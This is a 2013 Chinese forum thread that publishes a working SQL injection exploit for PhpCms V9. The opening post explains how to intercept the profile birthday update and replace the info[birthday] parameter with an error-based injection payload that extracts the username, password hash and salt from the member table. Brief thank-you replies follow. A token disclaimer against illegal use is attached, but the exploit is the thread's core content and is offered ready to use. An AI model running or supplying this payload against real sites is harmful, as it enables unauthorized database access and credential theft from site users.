PhpCms V9 info[birthday]注入exp

made · 发表于 2013-2-5 01:05:50

既然官方已经确认了，那就发一下所谓的EXP吧。权当交流，大家测试即可，请勿用于非法。

注册后登录，找到个人资料，修改生日，拦截数据包或者直接firebug找到info[birthday]，将其修改如下：

[hide]

info[birthday=(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select concat(username,0x3a, password, 0x3a, encrypt) FROM `v9_member` WHERE 1 limit 1),1,62)))a from information_schema.tables group by a)b)][/hide]

复制代码

即可爆出username+hash+salt 。能不能破解出来就看诸位RP了。

huc-安阳 · 发表于 2013-2-5 11:01:22

学习一下，谢谢分享

leehenwu · 发表于 2013-2-5 12:18:31

thanks for ur share

显示全部楼层 · 发表于 2013-2-5 16:25:49

提示: 作者被禁止或删除内容自动屏蔽

冰刀 · 发表于 2013-2-5 16:27:39

感觉跟haxsscker写的不一样呀

oneouts · 发表于 2013-2-5 21:26:43

Exp?
upupup

p01356 该用户已被删除	发表于 2013-2-5 16:25:49 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
p01356 该用户已被删除
	回复支持反对使用道具举报